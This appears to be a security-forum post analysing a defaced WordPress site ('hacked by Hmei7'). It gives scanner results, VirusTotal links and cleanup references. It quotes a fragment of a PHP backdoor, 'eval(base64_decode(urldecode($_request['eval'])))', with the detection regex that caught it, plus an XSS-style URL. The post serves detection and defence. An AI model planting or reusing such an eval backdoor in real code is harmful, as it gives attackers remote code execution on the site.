See: https://www.virustotal.com/nl/url/028678a7c7e2485e5d50995509c93679e4a9312a1dc9e89b279bfa2af49078bb/analysis/1399987520/
missed completely.
Too much of the malcode exposed on site?
Sucuri detects as defaced: Web site defaced. Details: http://sucuri.net/malware/entry/MW:DEFACED:01

hacked by Hmei7

*Web site defaced. Details: http://sucuri.net/malware/entry/MW:DEFACED:01

hacked by Hmei7

Solutions read here: http://wordpress.org/support/topic/hacked-by-hmei7 (info credits go to LolDig) *Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwdefaced01?v50 hacked by Hmei7 and d3b~X internal redirect. Vulnerable: WordPress theme: htxp://www.joshpate.com/wp-content/themes/twentytwelve/ (file and folder permissions) About the general hackability of WP: http://wiki.dreamhost.com/My_Wordpress_site_was_hacked

On site - Javascript check:
Suspicious

{0,40})?base64_decode\s*(/i: eval(base64_decode(urldecode($_request[‘eval’]))); break; case ‘inject’: echo ”
regex (3 of 5): /(eval\s*(.{0,40})?base64_dec…

Spam check or better even defacement check: Suspicion of Spam

" /> how to fix “hacked by hmei7″ on joomla web site | joshpate.dot com <link rel=“profile” href=…

Site wide check: Suspicious

chives: hacked. how to fix â��hacked by hmei7â�³ on joomla web site · 13
facebook comments · 179 repl

external link unavailable: htxp://www.wphackpros.com/site.aspx?aspxerrorpath=/%C2%A0%C2%A0–%3E%C2%A0%C2%A0%27rohan%27
with a flag alert for XSS attack by malware script detector extension, (unicode for non breaking space MME parser with HTML-code)

polonus

VirusTotal
https://www.virustotal.com/en/file/016cc7ebc9d4ab4e9f4e73b8e545afdb33a9ee1f09b32fa0ebb6c8e5620f1729/analysis/1399992345/
https://www.virustotal.com/en/file/bd460774aea299d5c813c0bbec1f672da6c96740d5b1c3a4be2c76093ae095c2/analysis/1399992429/